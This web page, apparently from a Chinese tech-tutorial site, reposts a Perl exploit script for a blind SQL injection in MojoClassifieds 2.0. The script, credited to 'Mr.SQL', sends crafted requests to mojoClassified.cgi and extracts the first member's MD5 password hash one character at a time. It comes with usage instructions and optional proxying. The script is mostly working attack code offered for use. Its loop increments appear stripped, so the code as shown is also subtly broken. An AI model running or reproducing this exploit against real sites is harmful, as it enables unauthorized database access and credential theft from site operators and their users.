• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > MojoClassifieds 2.0 Remote Blind SQL Injection Exploit

MojoClassifieds 2.0 Remote Blind SQL Injection Exploit

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了MojoClassifieds 2.0 Remote Blind SQL Injection Exploit ,其中包含exploit,exploit是什么意思,exploit db,exploit开拓官网,exploit开拓工具等知识点,遇到此问题的同学们可以参考下
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #################### Viva IslaMe Viva IslaMe ################\n";
print " # MojoClassifieds Blind SQL Injection Exploit #\n";
print " # (mojoClassified.cgi mojo ) #\n";
print " # Author: Mr.SQL #\n";
print " # EMAIL : SQL@HOTMAIL.IT #\n";
print " # #\n";
print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n";
print " # #\n";
print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n";
print " # :: ALwHeD :: milw0rm :: #\n";
print " # #\n";
print " # <<>> MuSliMs HaCkErS <<>> #\n";
print " # #\n";
print " # HOME: WwW.PaL-HaCkEr.CoM #\n";
print " # #\n";
print " # Usage : perl test.pl host #\n";
print " # Example: perl test.pl www.host.com / -d 10 #\n";
print " # Options: #\n";
print " # -d valid cat_a value #\n";
print " #############################################################\n";
exit;
}
my $host = $ARGV[0];
my $cat_a = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "d=i");
print "[~] Exploiting...\n";
if($options{"b"})
{
$mojo = $options{"b"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i )
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $cat_a, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h ;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $cat_a, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h ;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $cat_a = shift;
my $i = shift;
my $h = shift;

my $ua = LWP::UserAgent->new;
my $query = "http://".$host."mojoClassified.cgi?mojo=1&cat_a=".$cat_a." and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")";

if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}

my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "tourterms.pdf";

if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}

</div>

您可能想查找下面的文章:

  • Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
  • IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit
  • IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
  • MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
  • Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit
  • Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit
  • Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit
  • Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)
  • NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit
  • WinRemotePC Full Lite 2008 r.2server Denial of Service Exploit

相关文章

  • Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
  • jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities
  • PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC
  • Linux Kernel
  • Poppler
  • CoolPlayer m3u File Local Buffer Overflow Exploit
  • Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
  • NoName Script
  • IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit
  • Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit
    • Maian Recipe
    • Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit
    • BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability
    • ESET Smart Security 3.0.667.0 Privilege Escalation PoC
    • Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day
    • The Personal FTP Server 6.0f RETR Denial of Service Exploit
    • phpDatingClub (website.php page) Local File Inclusion Vulnerability
    • Maian Weblog
    • Sagem Routers F@ST Remote CSRF Exploit (dhcp hostname attack)

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有